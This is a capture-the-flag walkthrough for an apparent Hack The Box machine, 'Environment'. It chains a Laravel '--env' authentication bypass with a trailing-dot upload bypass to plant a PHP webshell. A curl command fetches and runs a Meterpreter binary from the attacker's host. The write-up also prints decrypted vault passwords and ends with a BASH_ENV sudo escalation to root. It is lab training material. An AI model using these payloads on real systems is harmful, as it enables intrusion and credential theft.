Environment

Overview

Environment is a Laravel PHP application machine with two chained CVEs: an environment variable injection (CVE-2024-52301) that bypasses authentication entirely by passing --env=preprod to the Laravel artisan CLI, followed by a file upload MIME type bypass (CVE-2025-27515) to achieve RCE. Post-foothold, GPG private keys in a user's home directory decrypt a password vault. Privilege escalation uses BASH_ENV to inject a shell script into a sudoable command that sources the environment.

Recon

Nmap

sudo nmap -sC -sV -vv -oA tcp 10.129.232.3 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.232.3

The application runs on port 80 and responds as http://environment.htb/. Add to /etc/hosts.

Application Fingerprinting

Laravel is identified by its session cookies (laravel_session, XSRF-TOKEN):

Login Form Anomaly

Accessing a POST-only page via GET returns an error:

Modifying the remember parameter from true/false to any other value causes a different error during login form submission:

Foothold

CVE-2024-52301 - Authentication Bypass via --env

This vulnerability affects Laravel applications where the framework processes the APP_ENV value from the URL or request, allowing an attacker to override the environment. The preprod environment is configured to disable authentication.

Add --env=preprod to the login form's POST URL by editing the form action directly in the browser:

POST /login?--env=preprod

Reference: https://github.com/Nyamort/CVE-2024-52301

Access is granted to the management dashboard, which exposes a mailing list and a profile avatar upload feature:

CVE-2025-27515 - File Upload Bypass (Webshell)

The same Laravel version is vulnerable to a file upload filter bypass. The upload endpoint checks the MIME type but not the actual file extension after a trailing dot. A .php. extension (with trailing dot) is accepted as an image but stored as a PHP file:

import requests
 
session = requests.session()
 
# CSRF token extraction and webshell upload
fc = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00<?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>"
 
files = {'upload': ('syk02.jpg.php.', fc, 'image/jpeg')}
data = {'_token': token}
 
re_upload = session.post("http://environment.htb:80/upload", data=data, files=files)

The webshell is accessible at:

http://environment.htb/storage/files/syk02.jpg.php

Execute commands via the cmd parameter. Upload and execute a Meterpreter binary:

POST /storage/files/syk02.jpg.php HTTP/1.1
Host: environment.htb
...
 
cmd=curl http://10.10.15.150/e -o /tmp/e;chmod 0777 /tmp/e;/tmp/e%26

Meterpreter session received:

Lateral Movement

User Enumeration

A user hish exists on the system:

The database contains three user records:

Hashed passwords don't crack - move on.

GPG Private Key Decryption

Linpeas finds GPG keys in /home/hish/.gnupg/:

Download the entire GPG keystore and private keys:

/home/hish/.gnupg/private-keys-v1.d/C2DF4CF8B7B94F1EEC662473E275A0E483A95D24.key
/home/hish/.gnupg/private-keys-v1.d/3B966A35D4A711F02F64B80E464133B0F0DBCB04.key
/home/hish/.gnupg/trustdb.gpg
/home/hish/.gnupg/pubring.kbx

Recreate the GPG directory structure locally, import the keys, and decrypt the vault file:

gpg --homedir . --list-keys
gpg --homedir . --out keyvault --decrypt keyvault.gpg

Decrypted contents:

PAYPAL.COM -> Ihaves0meMon$yhere123
ENVIRONMENT.HTB -> marineSPm@ster!!
FACEBOOK.COM -> summerSunnyB3ACH!!

The ENVIRONMENT.HTB password belongs to hish.

Privilege Escalation

BASH_ENV - Sudo Injection

With hish's password, check sudo -l:

hish can run /usr/bin/systeminfo as root. The command is executed in a bash context - and BASH_ENV is an environment variable that specifies a file to source whenever bash starts (even non-interactively). Since sudo preserves BASH_ENV, we can inject arbitrary code that runs as root before systeminfo executes.

Create t.sh (our Meterpreter binary launcher):

#!/bin/bash
 
/tmp/e &

Set BASH_ENV and trigger sudo:

BASH_ENV=/home/hish/t.sh sudo /usr/bin/systeminfo

When sudo executes bash to run systeminfo, bash sources t.sh first - running our Meterpreter binary as root.

Attack Chain Summary